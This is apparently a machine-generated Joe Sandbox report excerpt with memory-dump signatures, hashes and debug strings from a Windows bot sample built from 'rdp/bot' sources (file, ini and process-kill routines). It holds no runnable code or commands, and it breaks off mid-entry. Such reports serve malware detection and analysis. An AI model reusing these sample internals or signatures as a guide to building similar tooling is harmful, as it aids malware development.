                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: AttributesErrorFileLast
                  • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                  • API String ID: 1799206407-3397184676
                  • Opcode ID: 43a625aec629d03aa6d79cb5304ec5a52587ca642a261aee81729d9de08253ea
                  • Instruction ID: 2ae66cfd2331f5e0c9d9ca2c5db4ea6c9db17cb4a79edc6b305eb341da85205f
                  • Opcode Fuzzy Hash: 43a625aec629d03aa6d79cb5304ec5a52587ca642a261aee81729d9de08253ea
                  • Instruction Fuzzy Hash: 8C51E8A0A0C617D1FB30BF47B9C03B8E6506F04B94ED46133D95E06FB5AE6DA946CB21
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                  • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                  • API String ID: 1721699506-2819899730
                  • Opcode ID: 8d39322b9df4c2373581e90f25656c1ce6d57fc1d0652e8ea0d116a04eb80657
                  • Instruction ID: a6ff349881626ba7e1f34d444fa06e99d466cb91e58976a65c3043cbbb779ab4
                  • Opcode Fuzzy Hash: 8d39322b9df4c2373581e90f25656c1ce6d57fc1d0652e8ea0d116a04eb80657
                  • Instruction Fuzzy Hash: 4C614762F0C947D1FA30AF16EA803B8A251AF80748FD5A037D64D47790DE3DE946CB69
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: strlen
                  • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                  • API String ID: 39653677-3302659514
                  • Opcode ID: 9005fe6a1410ecbce5668f3390039774c4afe792ecc5d441caa394cae7a7bd6d
                  • Instruction ID: 9ba9bdaa121d11f8a460dc8faa53b15613273c28ee7c21b865395cd9bb8a64c9
                  • Opcode Fuzzy Hash: 9005fe6a1410ecbce5668f3390039774c4afe792ecc5d441caa394cae7a7bd6d
                  • Instruction Fuzzy Hash: 1E414961A09A43C0FE20BF57EA803B8E661AF40748FD86533D65D0B795EE3CE506CB24
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: Heap$Processstrlen$AllocFree
                  • String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                  • API String ID: 1318626975-3964590784
                  • Opcode ID: 31a9b0c9ef57b586841b2a845dbacab838252a909a596c335d565df8be9533e0
                  • Instruction ID: f9b8f0b72d156009310a74c767b8d1b2572ec30089ad3355f9c2ecb546badcde
                  • Opcode Fuzzy Hash: 31a9b0c9ef57b586841b2a845dbacab838252a909a596c335d565df8be9533e0
                  • Instruction Fuzzy Hash: A3315721A09A47C5FA21FF13E8887B5A250AF84784FD86037D94D47B95EF3CE805C760
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: AttributesFile$ErrorLast
                  • String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                  • API String ID: 365566950-3085771803
                  • Opcode ID: f93d3b2482f8f60f86716dc3046e84e5b04d6afd5cb927c8b4350ba3ed7eb197
                  • Instruction ID: e1150eb95c87f58f7d5373f5f2b2fc9a6a65ead1ac75409aa9910929e15496c4
                  • Opcode Fuzzy Hash: f93d3b2482f8f60f86716dc3046e84e5b04d6afd5cb927c8b4350ba3ed7eb197
                  • Instruction Fuzzy Hash: C4512961A1C647C6FA70BF16B5C02B9E661AF00744FA06133D91E86FB5EE2CE945CF21
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                  • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                  • API String ID: 497672076-1436771859
                  • Opcode ID: 8ed55aa620519c3cdf6ef64e90ec8783e4cc27decb79bbf1141b998d3a3c6f77
                  • Instruction ID: ac400ba14489c1f079ef94f36fc3902115ed6863fc034b056813296a112d0def
                  • Opcode Fuzzy Hash: 8ed55aa620519c3cdf6ef64e90ec8783e4cc27decb79bbf1141b998d3a3c6f77
                  • Instruction Fuzzy Hash: 63416D61B0C943C0FB30EF17E6C0AB8E650AF507A8F946233C51D17BD59E2CA546CB65
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
                  • String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
                  • API String ID: 4155868088-3920367287
                  • Opcode ID: d71845054931ee5661a4f0e49c7727aec33fd4ebbd6fe1cfdbad0b32c19fbd7b
                  • Instruction ID: ad1528e4e6d35d04ae0857aafb3859ddc434f5ab826e86617db7f885bc342854
                  • Opcode Fuzzy Hash: d71845054931ee5661a4f0e49c7727aec33fd4ebbd6fe1cfdbad0b32c19fbd7b
                  • Instruction Fuzzy Hash: E2315025A08A47C1FA34AF07E4C0779E350AF48B81F849137CA4D47791EE2CE985DB30
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: ErrorFileLastModuleName
                  • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
                  • API String ID: 2776309574-2006444783
                  • Opcode ID: 5ef8a0c181d4ca2dc1b4e531f8c728615214ac54cca10b92b6d115fd732b93fd
                  • Instruction ID: 6c24b83e4568f59804100d842ee68d95f10354f0e6460c826e93a2d3c5a91887
                  • Opcode Fuzzy Hash: 5ef8a0c181d4ca2dc1b4e531f8c728615214ac54cca10b92b6d115fd732b93fd
                  • Instruction Fuzzy Hash: C7315A61A08907D1EE21EF17EA807B4A650BF00748FC4A133EA0C477A1EF6CA905CB20
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateHandleSize
                  • String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                  • API String ID: 3555958901-1687387729
                  • Opcode ID: 234c72b99976422c0fe9b9bc8d23519320ee5f2015ad074ca9f2bb95160527cb
                  • Instruction ID: 5a6d0c9d2741b01c3010318176a9b9bb4df7dab128dc5649771f8911aadf77db
                  • Opcode Fuzzy Hash: 234c72b99976422c0fe9b9bc8d23519320ee5f2015ad074ca9f2bb95160527cb
                  • Instruction Fuzzy Hash: C3612C65E0C122C2FE307E17A0C437892509F41374FA966B3C45E9B3D1DE6DACC68A72
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: ErrorLastObjectSingleWait
                  • String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
                  • API String ID: 1211598281-4195011794
                  • Opcode ID: e89e575069cd377681ba40a6117d1222de3d5140e96875bd9f274161d09d8a40
                  • Instruction ID: ed3dea2ed0da3d19625635b1bad39b03fc1ef3c6c97ed7bccfd6303fcd7a2799
                  • Opcode Fuzzy Hash: e89e575069cd377681ba40a6117d1222de3d5140e96875bd9f274161d09d8a40
                  • Instruction Fuzzy Hash: B631CC10E0C207C2FF74BF56B4D43B8D2509F45314EE46533C61F86BA2DD5DA9869AB2
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: File$CloseCreateErrorHandleLastTime
                  • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                  • API String ID: 2291555494-3647951244
                  • Opcode ID: 7d329871a1d9df9c714f38f2d1b57bc2c9dca41de0c0c3b0928d58f10eb66f42
                  • Instruction ID: 4e615c16574e6c4d2663bf81c3e71d89378cbbff13ed748755cda2dbac57d2de
                  • Opcode Fuzzy Hash: 7d329871a1d9df9c714f38f2d1b57bc2c9dca41de0c0c3b0928d58f10eb66f42
                  • Instruction Fuzzy Hash: 61516F61E0C222C2FB307F1296C8379D291AF007A8F986237D91D5B7D5DE6DAC45CB61
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: _errno$_strtoui64
                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                  • API String ID: 3513630032-2210897324
                  • Opcode ID: a18c6c83516754f6b857dd7fe20c6f15bd4307d0d919e2e26326aedb1b51f943
                  • Instruction ID: 83813b65f0f49d12102fe2ad8e7d6480d7f717ccf21e9fdcf181dc21bfd9e608
                  • Opcode Fuzzy Hash: a18c6c83516754f6b857dd7fe20c6f15bd4307d0d919e2e26326aedb1b51f943
                  • Instruction Fuzzy Hash: EA219122608A46D6E721AF56F8807BAB361FB84784F845037EE4C47754DF3DE885CB20
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: Virtual$ErrorLastProtectQuery
                  • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                  • API String ID: 637304234-2693646698
                  • Opcode ID: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                  • Instruction ID: 7bdb82804125e8d49b6926814e037f3a46a24e2ac93f32473d513f07aa5afc5e
                  • Opcode Fuzzy Hash: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                  • Instruction Fuzzy Hash: 7B318F71B09A02C6EE10AF17E8C5279A7A1FB98B94F849136DD0C473A4DE3EE446CB50
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: _errno
                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                  • API String ID: 2918714741-1991603811
                  • Opcode ID: e7187c9a11c645367552c642aa7f2f5f2e0bf4b76542b37ff506af664c279139
                  • Instruction ID: e85db5e5b436aeb5afb4275871271ece685d23dbf2169778c071fc5bd2dd33df
                  • Opcode Fuzzy Hash: e7187c9a11c645367552c642aa7f2f5f2e0bf4b76542b37ff506af664c279139
                  • Instruction Fuzzy Hash: 9D216221A08647D2E721AF17E980BAAB760FB45788F945137EE4C47764DF3CE845CB10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                  • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                  • API String ID: 1211020085-2360327764
                  • Opcode ID: 35c2247d9284a21acdfb19c25fbd791187a1e68ef57c37c9b76c6c1b040fd45c
                  • Instruction ID: 2c9cf49c905ce1e328979518363713966c308af7e04928a8ae79c2c01a7b0aa2
                  • Opcode Fuzzy Hash: 35c2247d9284a21acdfb19c25fbd791187a1e68ef57c37c9b76c6c1b040fd45c
                  • Instruction Fuzzy Hash: 40115615E09703C2FE74BF57A4E03BAA691AF45785F84703BCC4E46395EE6EE845CA20
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                  • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                  • API String ID: 1211020085-2360327764
                  • Opcode ID: 2079d633573d248d1c709dc4b8974b407ef0d37a5f2afb356190c5b70f397a6d
                  • Instruction ID: e380d13d4c510fb0df49c9d57c1a26de9303c8c5fa2117e58f3cf6317d82a216
                  • Opcode Fuzzy Hash: 2079d633573d248d1c709dc4b8974b407ef0d37a5f2afb356190c5b70f397a6d
                  • Instruction Fuzzy Hash: F7115915E09603C2FE74BF57A4E03BAA691AF45785F843037CC0E46395EE6DE845CA20
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
